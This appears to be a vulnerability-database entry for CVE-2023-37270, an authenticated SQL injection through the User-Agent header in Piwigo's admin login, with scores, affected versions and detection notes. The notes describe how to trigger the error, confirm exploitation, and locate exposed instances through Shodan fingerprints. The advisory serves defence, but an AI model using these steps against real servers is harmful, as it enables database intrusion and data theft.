cbcvebase.
CVE-2023-37270
published 2023-07-07

CVE-2023-37270: Piwigo is open source photo gallery software. Prior to version 13.8.0, there is a SQL Injection vulnerability in the login of the administrator screen. The SQL…

PriorityP263high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
3.91%
89.0th percentile
Piwigo is open source photo gallery software. Prior to version 13.8.0, there is a SQL Injection vulnerability in the login of the administrator screen. The SQL statement that acquires the HTTP Header `User-Agent` is vulnerable at the endpoint that records user information when logging in to the administrator screen. It is possible to execute arbitrary SQL statements. Someone who wants to exploit the vulnerability must be log in to the administrator screen, even with low privileges. Any SQL statement can be executed. Doing so may leak information from the database. Version 13.8.0 contains a fix for this issue. As another mitigation, those who want to execute a SQL statement verbatim with user-enterable parameters should be sure to escape the parameter contents appropriately.

Affected

1 ranges
VendorProductVersion rangeFixed in
piwigopiwigo< 13.8.013.8.0

Detection & IOCsextracted from sources · hover to see the quote

url/identification.php
url/admin.php?page=user_activity
  • The SQL injection is triggered via the HTTP `User-Agent` header on the POST /identification.php login endpoint. Inject SQL-breaking characters (e.g., single-quote, double-quote, angle brackets) in the User-Agent to trigger a MySQL error visible in the subsequent /admin.php?page=user_activity response.
  • Confirm exploitation by checking the response body of GET /admin.php?page=user_activity for the strings 'Warning: [mysql error', 'INSERT INTO', and 'SQL syntax;' appearing together.
  • Exploitation requires at least low-privilege authenticated access to the Piwigo administrator screen before the injection can be triggered.
  • Use Shodan/FOFA fingerprinting (favicon hash 540706145 or title 'piwigo') to identify exposed Piwigo instances for targeted scanning.
  • The vulnerable code path is in include/dblayer/functions_mysqli.inc.php (line 491) and include/functions.inc.php (line 621); patch reference is commit 978425527d6c113887f845d75cf982bbb62d761a.
  • ·Exploitation requires prior authentication to the Piwigo admin panel (even low-privilege credentials), so this is not an unauthenticated attack surface.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.